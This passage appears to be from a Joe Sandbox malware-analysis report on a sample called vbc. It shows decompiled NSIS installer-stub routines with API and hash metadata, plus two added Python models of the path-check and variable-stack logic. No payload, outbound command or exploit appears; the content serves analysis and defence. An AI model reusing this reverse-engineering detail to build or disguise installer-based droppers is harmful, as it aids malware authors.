                    Statement addresses (address column of the side-by-side code view): 0x00405e9d, 0x00405ea4, 0x00405ea7, 0x00405ea9, 0x00405eaf, 0x00405ec7, 0x00405ee9, 0x00000000, 0x00405ecf, 0x00405ed1, 0x00405ed2, 0x00405ed5, 0x00405ed6, 0x00405edf, 0x00000000, 0x00000000, 0x00405ee2, 0x00405ee5, 0x00000000, 0x00000000, 0x00000000, 0x00405ee5, 0x00000000, 0x00405ed2, 0x00405ebe, 0x00000000, 0x00405ebf

                    APIs
                    Strings
                    • C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 00405E95
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharNext
                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp
                    • API String ID: 3213498283-2005183556
                    • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                    • Instruction ID: c1792dff9018e3c7d7ac3158fe05bd311bc395bc4b40032904b556d4a70b82f0
                    • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                    • Instruction Fuzzy Hash: 83F09031920F1195DB31B754CC55E7766BCEB98765B00843BE681B72C1D3B88A828AEA
                    Uniqueness

                    Uniqueness Score: -1.00%
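The three routines E00405E94, E00405EF1 and E00405DE9 (further down) are the dropped executable's install-path checks; the "NSIS Error" string referenced from E0040651A and the nsf2EB0.tmp temp-file name point at an NSIS installer stub. The following is an added, readable Python rendering of what the decompiled code above does, written for this page and not taken from the sample, from Joe Sandbox or from the NSIS project. It assumes the string at 0x40a014 is a single backslash, approximates E004067A1 (not shown on this page) by trimming trailing blanks and backslashes, and replaces the disk with a constructed in-memory table in place of E00406850/GetFileAttributesW.

```python
"""Readable rendering of the install-path checks in the decompiled stub
(E00405E94 root skipping, E00405EF1 validation, E00405DE9 trailing slash).
Added example; the disk is a constructed table, not the analysis VM."""
from typing import Dict, Optional

NO_ROOT_DIR_FLAG = 0x80           # bit of *0x7a8a78 tested in E00405EF1
FILE_ATTRIBUTE_DIRECTORY = 0x10   # bit tested on the E00406850 result


def skip_root(path: str) -> Optional[int]:
    """Offset just past the root of PATH, or None when PATH has no root.

    E00405E94 accepts two shapes: "X:\\..." (returns path+3) and
    "\\\\host\\share\\..." (skips the host and share components).
    """
    if len(path) >= 3 and path[1] == ":" and path[2] == "\\":
        return 3
    if path.startswith("\\\\"):
        pos = 2
        for _ in range(2):            # host, then share
            nxt = path.find("\\", pos)
            if nxt == -1:             # E00405E16 ran into the terminator
                return None
            pos = nxt + 1             # one WCHAR past the backslash
        return pos
    return None


def trim_slash_to_end(path: str) -> str:
    """E00405E35: cut PATH at its last backslash (empty string if there is none)."""
    i = path.rfind("\\")
    return path[:i] if i != -1 else ""


def add_trailing_slash(path: str) -> str:
    """E00405DE9: append a backslash unless the last character already is one
    (assumes the string at 0x40a014 is a single backslash)."""
    return path if path.endswith("\\") else path + "\\"


def is_valid_instpath(path: str, disk: Dict[str, int], flags: int = 0) -> bool:
    """E00405EF1: PATH is usable only if no existing ancestor is a plain file
    and its root exists.

    DISK stands in for E00406850/GetFileAttributesW: lower-cased path ->
    attribute bits for paths that exist; anything absent does not exist.
    """
    root = skip_root(path)
    if root is None:
        return False
    tmp = path[:root] + path[root:].rstrip(" \\")      # E004067A1, approximated
    if flags & NO_ROOT_DIR_FLAG and (len(tmp) == root or tmp[root] == "\\"):
        return False
    while len(tmp) > root:                             # walk up to, not past, the root
        attrs = disk.get(tmp.lower())
        if attrs is not None and not attrs & FILE_ATTRIBUTE_DIRECTORY:
            return False                               # an existing ancestor is a file
        tmp = trim_slash_to_end(tmp)
    return add_trailing_slash(tmp).lower() in disk     # the root itself must exist


# Constructed stand-in for the analysis VM's disk (not taken from the report).
FAKE_DISK: Dict[str, int] = {
    "c:\\": 0x10,
    "c:\\users": 0x10,
    "c:\\users\\user": 0x10,
    "c:\\users\\user\\appdata": 0x10,
    "c:\\users\\user\\appdata\\local": 0x10,
    "c:\\users\\user\\appdata\\local\\temp": 0x10,
    "c:\\users\\user\\desktop\\notes.txt": 0x20,   # a plain file
}

# Path the report shows being passed to lstrlenW inside E00405EF1.
NSIS_TMP = r"C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp"

if __name__ == "__main__":
    print(is_valid_instpath(NSIS_TMP, FAKE_DISK))                                 # True
    print(is_valid_instpath(r"C:\Users\user\Desktop\notes.txt\sub", FAKE_DISK))  # False
    print(is_valid_instpath(r"\\srv\share\dir", FAKE_DISK))                      # False
    print(is_valid_instpath("C:\\", FAKE_DISK, flags=NO_ROOT_DIR_FLAG))          # False
```

The walk stops at the root rather than at the filesystem root, so a path whose root does not exist (an absent drive letter or UNC share) fails on the final existence check, and a relative path fails before any disk lookup because skip_root rejects it.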

                    C-Code - Quality: 58%
                    			E00405DE9(WCHAR* _a4) {
                    				WCHAR* _t9;
                    
                    				_t9 = _a4;
                    				_push( &(_t9[lstrlenW(_t9)]));
                    				_push(_t9);
                    				if( *(CharPrevW()) != 0x5c) {
                    					lstrcatW(_t9, 0x40a014);
                    				}
                    				return _t9;
                    			}

                    APIs
                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DEF
                    • CharPrevW.USER32(?,00000000), ref: 00405DF9
                    • lstrcatW.KERNEL32 ref: 00405E0B
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE9
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-4017390910
                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                    • Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E734F10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                    				void* _v0;
                    				void* _t27;
                    				signed int _t29;
                    				void* _t30;
                    				void* _t34;
                    				void* _t36;
                    				void* _t38;
                    				void* _t40;
                    				void* _t48;
                    				void* _t54;
                    				void* _t63;
                    				void* _t64;
                    				signed int _t66;
                    				void* _t67;
                    				void* _t73;
                    				void* _t74;
                    				void* _t77;
                    				void* _t80;
                    				void _t81;
                    				void _t82;
                    				intOrPtr _t84;
                    				void* _t86;
                    				void* _t88;
                    
                    				 *0x734f506c = _a8;
                    				 *0x734f5070 = _a16;
                    				 *0x734f5074 = _a12;
                    				_a12( *0x734f5048, E734F1651, _t73);
                    				_t66 =  *0x734f506c +  *0x734f506c * 4 << 3;
                    				_t27 = E734F12E3();
                    				_v0 = _t27;
                    				_t74 = _t27;
                    				if( *_t27 == 0) {
                    					L28:
                    					return GlobalFree(_t27);
                    				}
                    				do {
                    					_t29 =  *_t74 & 0x0000ffff;
                    					_t67 = 2;
                    					_t74 = _t74 + _t67;
                    					_t88 = _t29 - 0x66;
                    					if(_t88 > 0) {
                    						_t30 = _t29 - 0x6c;
                    						if(_t30 == 0) {
                    							L23:
                    							_t31 =  *0x734f5040;
                    							if( *0x734f5040 == 0) {
                    								goto L26;
                    							}
                    							E734F1603( *0x734f5074, _t31 + 4, _t66);
                    							_t34 =  *0x734f5040;
                    							_t86 = _t86 + 0xc;
                    							 *0x734f5040 =  *_t34;
                    							L25:
                    							GlobalFree(_t34);
                    							goto L26;
                    						}
                    						_t36 = _t30 - 4;
                    						if(_t36 == 0) {
                    							L13:
                    							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                    							_t74 = _t74 + _t67;
                    							_t34 = E734F1312(E734F135A(_t38));
                    							L14:
                    							goto L25;
                    						}
                    						_t40 = _t36 - _t67;
                    						if(_t40 == 0) {
                    							L11:
                    							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                    							_t74 = _t74 + _t67;
                    							_t34 = E734F1381(_t80, E734F12E3());
                    							goto L14;
                    						}
                    						L8:
                    						if(_t40 == 1) {
                    							_t81 = GlobalAlloc(0x40, _t66 + 4);
                    							_t10 = _t81 + 4; // 0x4
                    							E734F1603(_t10,  *0x734f5074, _t66);
                    							_t86 = _t86 + 0xc;
                    							 *_t81 =  *0x734f5040;
                    							 *0x734f5040 = _t81;
                    						}
                    						goto L26;
                    					}
                    					if(_t88 == 0) {
                    						_t48 =  *0x734f5070;
                    						_t77 =  *_t48;
                    						 *_t48 =  *_t77;
                    						_t49 = _v0;
                    						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                    						if( *((short*)(_t77 + 4)) == 0x2691) {
                    							E734F1603(_t49, _t77 + 8, 0x38);
                    							_t86 = _t86 + 0xc;
                    						}
                    						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                    						GlobalFree(_t77);
                    						goto L26;
                    					}
                    					_t54 = _t29 - 0x46;
                    					if(_t54 == 0) {
                    						_t82 = GlobalAlloc(0x40,  *0x734f506c +  *0x734f506c + 8);
                    						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                    						_t14 = _t82 + 8; // 0x8
                    						E734F1603(_t14, _v0, 0x38);
                    						_t86 = _t86 + 0xc;
                    						 *_t82 =  *( *0x734f5070);
                    						 *( *0x734f5070) = _t82;
                    						goto L26;
                    					}
                    					_t63 = _t54 - 6;
                    					if(_t63 == 0) {
                    						goto L23;
                    					}
                    					_t64 = _t63 - 4;
                    					if(_t64 == 0) {
                    						 *_t74 =  *_t74 + 0xa;
                    						goto L13;
                    					}
                    					_t40 = _t64 - _t67;
                    					if(_t40 == 0) {
                    						 *_t74 =  *_t74 + 0xa;
                    						goto L11;
                    					}
                    					goto L8;
                    					L26:
                    				} while ( *_t74 != 0);
                    				_t27 = _v0;
                    				goto L28;
                    			}

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 734F1171
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 734F11E3
                    • GlobalFree.KERNEL32 ref: 734F124A
                    • GlobalFree.KERNEL32(?), ref: 734F129B
                    • GlobalFree.KERNEL32(00000000), ref: 734F12B1
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$Free$Alloc
                    • String ID:
                    • API String ID: 1780285237-0
                    • Opcode ID: 7e00feaecf6a4ead55bf7f79202ba088aa16e3caec578b435fc7449cb293885c
                    • Instruction ID: 3ab0df95bbb567b403e9c173cf8a5ab9edbb08b8339baf1c54f5d1a4baf8521b
                    • Opcode Fuzzy Hash: 7e00feaecf6a4ead55bf7f79202ba088aa16e3caec578b435fc7449cb293885c
                    • Instruction Fuzzy Hash: 23515CB6900203DFE708EFA9D944B167BF8EB08315B1D415AE94AEB350E734DA11CB58
                    Uniqueness

                    Uniqueness Score: -1.00%
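
                    Added example, not part of the Joe Sandbox report and not code from the sample: a Python model of the character dispatch that the decompiled E734F10E1 above implements. It is derived only from the switch visible in that listing: the whole variable block is saved and restored through the list at 0x734f5040 (s/S push a copy, l/L pop one back), a 0x38-byte record tagged with the magic 0x2691 is saved and restored through the list at 0x734f5070 (F, f), and a single variable is pushed or popped by the digit that follows p/r, with P/R adding 10 to the index. The roles given to the helpers E734F135A, E734F1312, E734F1381 and E734F12E3 (read variable n, push a value, store into variable n, pop a value) and the value stack they work on are assumptions; the report does not say what they do.

```python
# Added example, not code from the report or from the sample: a Python model
# of the character dispatch in the decompiled E734F10E1.  Each wide character
# of the command string selects one action:
#   s/S   copy the whole variable block onto a stack (the list at 0x734f5040)
#   l/L   pop that stack back into the variable block (no-op when empty)
#   F     push a 0x38-byte context record tagged with the magic 0x2691
#         (the list at 0x734f5070)
#   f     pop a context record and restore it only if the magic matches
#   p<d>, r<d>  push / pop one variable, index = digit; P<d>, R<d> add 10
# The helpers E734F135A, E734F1312, E734F1381 and E734F12E3 are not shown on
# the page; they are ASSUMED to read variable n, push a value, store into
# variable n and pop a value.  Unknown characters are skipped, as in the
# decompiled switch, which has no default action.

CONTEXT_MAGIC = 0x2691   # tag checked on "f" before the record is restored
CONTEXT_SIZE = 0x38      # bytes copied by "F" and "f"


class StoreMachine:
    def __init__(self, variables, context):
        self.vars = list(variables)          # variable block saved by s/S
        self.ctx = bytes(context)            # 0x38-byte context record
        self.var_stack = []                  # models the list at 0x734f5040
        self.ctx_stack = []                  # models the list at 0x734f5070
        self.value_stack = []                # assumed target of p/r
        if len(self.ctx) != CONTEXT_SIZE:
            raise ValueError("context record must be 0x38 bytes")

    def run(self, cmd):
        i = 0
        while i < len(cmd):
            c = cmd[i]
            i += 1
            if c in "sS":
                self.var_stack.append(list(self.vars))
            elif c in "lL":
                # the decompiled code tests the list head for NULL here
                if self.var_stack:
                    self.vars = self.var_stack.pop()
            elif c == "F":
                self.ctx_stack.append((CONTEXT_MAGIC, self.ctx))
            elif c == "f":
                # no NULL test precedes this pop in the decompiled code; the
                # model raises instead of dereferencing a missing entry
                if not self.ctx_stack:
                    raise IndexError('"f" with nothing saved by "F"')
                magic, saved = self.ctx_stack.pop()
                if magic == CONTEXT_MAGIC:
                    self.ctx = saved
            elif c in "pPrR":
                # the decompiled code reads the next character unconditionally,
                # so a trailing p/r would consume the terminator; reject that
                if i >= len(cmd):
                    raise ValueError(c + " needs a following digit")
                n = ord(cmd[i]) - ord("0")   # "(*_t74 & 0xffff) - 0x30"
                i += 1
                if c in "PR":
                    n += 10                  # "*_t74 = *_t74 + 0xa" before L13/L11
                if c in "pP":
                    self.value_stack.append(self.vars[n])
                else:
                    self.vars[n] = self.value_stack.pop()
            # any other character: no action, continue with the next one
        return self


def demo():
    """Save, clobber and restore the block; then move variable 0 into 10."""
    m = StoreMachine(["a", "b", "c"] + [""] * 17, b"\x00" * CONTEXT_SIZE)
    m.run("S")
    m.vars[0] = "clobbered"
    m.run("L")
    m.run("p0R0")
    return m


if __name__ == "__main__":
    m = demo()
    print(m.vars[0], m.vars[10])
```

                    One detail worth keeping in mind when reading the listing: the l/L path checks the list head at 0x734f5040 for NULL before popping, while the f path pops the list at 0x734f5070 without such a check; the model raises in that case rather than reproduce the dereference.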

                    C-Code - Quality: 92%
                    			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                    				signed int _t14;
                    				int _t17;
                    				void* _t24;
                    				intOrPtr* _t29;
                    				void* _t31;
                    				signed int _t32;
                    				void* _t35;
                    				void* _t40;
                    				signed int _t42;
                    
                    				_t29 = __edi;
                    				_t24 = __ebx;
                    				_t14 =  *(_t35 - 0x28);
                    				_t40 = __edx - 0x38;
                    				 *(_t35 - 0x10) = _t14;
                    				_t27 = 0 | _t40 == 0x00000000;
                    				_t32 = _t40 == 0;
                    				if(_t14 == __ebx) {
                    					if(__edx != 0x38) {
                    						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                    					} else {
                    						E00402DA6(0x21);
                    						E0040653C("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp", "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll", 0x400);
                    						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll");
                    					}
                    				} else {
                    					E00402D84(1);
                    					 *0x40adc8 = __ax;
                    					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                    				}
                    				 *(_t35 + 8) = _t17;
                    				if( *_t29 == _t24) {
                    					L13:
                    					 *((intOrPtr*)(_t35 - 4)) = 1;
                    				} else {
                    					_t31 = E0040647A(_t27, _t29);
                    					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060EB(_t31, _t31) >= 0) {
                    						_t14 = E004060BC(_t31, "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll",  *(_t35 + 8));
                    						_t42 = _t14;
                    						if(_t42 == 0) {
                    							goto L13;
                    						}
                    					} else {
                    						goto L13;
                    					}
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
                    				return 0;
                    			}

                    APIs
                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll), ref: 00402695
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp$C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll
                    • API String ID: 1659193697-2885240288
                    • Opcode ID: 104dd853bd667d595f2d4ef041d665a4b8afd0d56644d2e5248bfccfef6cc724
                    • Instruction ID: fdcd3470e26f59c64840f8c249bec33fde4ddddd182ca34a55142dcc3fd3dd5a
                    • Opcode Fuzzy Hash: 104dd853bd667d595f2d4ef041d665a4b8afd0d56644d2e5248bfccfef6cc724
                    • Instruction Fuzzy Hash: 6211E772A10315FACB10BBB19F4AE9E7670AF40748F21443FE002B21C1D6FD8891565E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403019(intOrPtr _a4) {
                    				long _t2;
                    				struct HWND__* _t3;
                    				struct HWND__* _t6;
                    
                    				if(_a4 == 0) {
                    					__eflags =  *0x79f700; // 0x0
                    					if(__eflags == 0) {
                    						_t2 = GetTickCount();
                    						__eflags = _t2 -  *0x7a8a6c;
                    						if(_t2 >  *0x7a8a6c) {
                    							_t3 = CreateDialogParamW( *0x7a8a60, 0x6f, 0, E00402F93, 0);
                    							 *0x79f700 = _t3;
                    							return ShowWindow(_t3, 5);
                    						}
                    						return _t2;
                    					} else {
                    						return E00406923(0);
                    					}
                    				} else {
                    					_t6 =  *0x79f700; // 0x0
                    					if(_t6 != 0) {
                    						_t6 = DestroyWindow(_t6);
                    					}
                    					 *0x79f700 = 0;
                    					return _t6;
                    				}
                    			}

                    APIs
                    • DestroyWindow.USER32 ref: 0040302C
                    • GetTickCount.KERNEL32(00000000,004031F7,00000001,?,?,?,?,?,0040385A,?), ref: 0040304A
                    • CreateDialogParamW.USER32 ref: 00403067
                    • ShowWindow.USER32(00000000,00000005), ref: 00403075
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                    • String ID:
                    • API String ID: 2102729457-0
                    • Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                    • Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
                    • Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                    • Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E004054F0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                    				int _t15;
                    				long _t16;
                    
                    				_t15 = _a8;
                    				if(_t15 != 0x102) {
                    					if(_t15 != 0x200) {
                    						_t16 = _a16;
                    						L7:
                    						if(_t15 == 0x419 &&  *0x7a1f34 != _t16) {
                    							_push(_t16);
                    							_push(6);
                    							 *0x7a1f34 = _t16;
                    							E00404EB1();
                    						}
                    						L11:
                    						return CallWindowProcW( *0x7a1f3c, _a4, _t15, _a12, _t16);
                    					}
                    					if(IsWindowVisible(_a4) == 0) {
                    						L10:
                    						_t16 = _a16;
                    						goto L11;
                    					}
                    					_t16 = E00404E31(_a4, 1);
                    					_t15 = 0x419;
                    					goto L7;
                    				}
                    				if(_a12 != 0x20) {
                    					goto L10;
                    				}
                    				E004044C2(0x413);
                    				return 0;
                    			}

                    APIs
                    • IsWindowVisible.USER32(?), ref: 0040551F
                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405570
                      • Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                    • Instruction ID: 9d4fd90c1d1287ad01f41678c6dcc1ca6f3bae65868fe0495ea0105890a895ad
                    • Opcode Fuzzy Hash: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
                    • Instruction Fuzzy Hash: CC01BC71100648BFEF209F11ED80A9B3B27FB84390F548037FA057A2E5C77A8D529A69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			// Decompiled helper: reads a registry string value into a caller-supplied
                    			// buffer of 0x800 bytes. Returns 0 only when the key opened, the query
                    			// succeeded and the value type was REG_SZ (1) or REG_EXPAND_SZ (2);
                    			// on any failure the output string is emptied.
                    			E004063E8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                    				int _v8;
                    				long _t21;
                    				long _t24;
                    				char* _t30;
                    
                    				asm("sbb eax, eax");
                    				_v8 = 0x800; // buffer size (bytes) handed to RegQueryValueExW
                    				// open the key with KEY_READ (0x00020019), optionally OR-ing in 0x100 depending on _a20
                    				_t21 = E00406387(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                    				_t30 = _a16;
                    				if(_t21 != 0) {
                    					L4:
                    					 *_t30 =  *_t30 & 0x00000000; // failure path: return an empty string
